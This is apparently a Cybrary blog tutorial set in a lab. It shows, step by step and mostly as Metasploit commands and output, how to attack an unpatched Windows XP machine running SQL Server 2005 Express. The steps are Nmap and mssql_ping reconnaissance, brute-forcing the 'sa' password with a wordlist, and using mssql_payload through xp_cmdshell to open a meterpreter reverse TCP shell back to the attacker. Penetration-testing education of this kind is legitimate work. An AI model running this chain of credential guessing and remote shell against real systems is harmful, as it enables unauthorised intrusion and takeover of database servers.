Exploiting MS SQL Server with Metasploit - Fast Track - Cybrary

The exploitee's system comprises:

  • Windows XP Pro Service Pack 2 (unpatched)
  • Firewall and software updates switched off
  • Microsoft Internet Information Services (IIS) (server) and FTP service enabled
  • SQL Server 2005 Express configured
  • A vulnerable web app up and running

Let's begin: Nmap scan from within Metasploit.

The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00 Running: Microsoft Windows XP|2003OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003Interestingly, Nmap couldn’t definitively identify which Windows Service Pack, but of course, I know it’s Service Pack 2.

MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU -p1434

PORT STATE SERVICE1434/udp open|filtered ms-sql-m

And, the scan confirms this. Now, use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > set RHOSTS => auxiliary(mssql_ping) > set THREADS 20THREADS => 20msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for[+] ServerName = LAB[+] InstanceName = SQLEXPRESS[+] IsClustered = No[+] Version = 9.00.1399.06[+] tcp = 1433[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

There's lots of information here. Now, brute force MS SQL with mssql_login:

>msf > use scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txtPASS_FILE => /usr/share/set/src/fasttrack/wordlist.txtmsf auxiliary(mssql_login) > set RHOSTS => auxiliary(mssql_login) > set THREADS 10THREADS => 10msf auxiliary(mssql_login) > exploit

[+] – MSSQL – successful login ‘sa’ : ‘password1′

MS SQL password and login successfully guessed. Now, use the mssql_payload, which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payloadmsf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(mssql_payload) > set LHOST => exploit(mssql_payload) > set LPORT 443LPORT => 443msf exploit(mssql_payload) > set RHOST => exploit(mssql_payload) > set PASSWORD password1PASSWORD => password1msf exploit(mssql_payload) > exploit

[*] Started reverse handler on[*] The server may have xp_cmdshell disabled, trying to enable it…[*] Command Stager progress – 1.47% done (1499/102246 bytes)


[*] Sending stage (751104 bytes) to[*] Command Stager progress – 100.00% done (102246/102246 bytes)[*] Meterpreter session 1 opened ( -> at 2013-06-13 10:39:46 +0100

meterpreter >

So, I’m inside the target machine with the Meterpreter shell. I hope this was helpful to you. Please post your comments and questions below.

Start learning with Cybrary

Create a free account

Related Posts

All Blogs